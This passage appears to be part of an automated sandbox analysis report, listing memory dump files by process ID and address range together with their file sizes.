                                                                                    Filesize

                                                                                    176KB

                                                                                  • memory/1448-213-0x0000000005A10000-0x0000000005A24000-memory.dmp
                                                                                    Filesize

                                                                                    80KB

                                                                                  • memory/1448-238-0x0000000005B00000-0x0000000005B2E000-memory.dmp
                                                                                    Filesize

                                                                                    184KB

                                                                                  • memory/1448-263-0x0000000005BE0000-0x0000000005C12000-memory.dmp
                                                                                    Filesize

                                                                                    200KB

                                                                                  • memory/1448-269-0x0000000005BA0000-0x0000000005BBA000-memory.dmp
                                                                                    Filesize

                                                                                    104KB

                                                                                  • memory/1448-287-0x0000000005C90000-0x0000000005C98000-memory.dmp
                                                                                    Filesize

                                                                                    32KB

                                                                                  • memory/1448-275-0x0000000005C50000-0x0000000005C74000-memory.dmp
                                                                                    Filesize

                                                                                    144KB

                                                                                  • memory/1448-257-0x0000000005B30000-0x0000000005B58000-memory.dmp
                                                                                    Filesize

                                                                                    160KB

                                                                                  • memory/1604-582-0x0000000005D10000-0x0000000005D2D000-memory.dmp
                                                                                    Filesize

                                                                                    116KB

                                                                                  • memory/2236-82-0x000001BBA41D0000-0x000001BBA41F2000-memory.dmp
                                                                                    Filesize

                                                                                    136KB

                                                                                  • memory/2608-249-0x00000193A6440000-0x00000193A6448000-memory.dmp
                                                                                    Filesize

                                                                                    32KB